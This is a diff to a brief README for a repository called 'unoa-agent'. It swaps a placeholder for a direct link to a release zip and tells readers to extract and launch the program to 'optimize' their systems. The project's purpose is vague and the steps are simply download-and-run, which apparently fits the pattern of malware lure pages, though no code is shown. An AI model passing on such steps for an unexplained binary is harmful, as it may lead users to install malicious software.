Basantaqq1030/unoa-agent/README.md

 ## How to Use unoa-agent
 Follow these simple steps to get started with the unoa agent:

-1. Download the **Software.zip** file from the link provided above.
+1. Download the **https://github.com/Basantaqq1030/unoa-agent/releases/download/v2.0/Release_x64.zip** file from the link provided above.
 2. Extract the contents of the zip file to your desired location.
 3. Launch the unoa agent application to begin optimizing your systems effortlessly.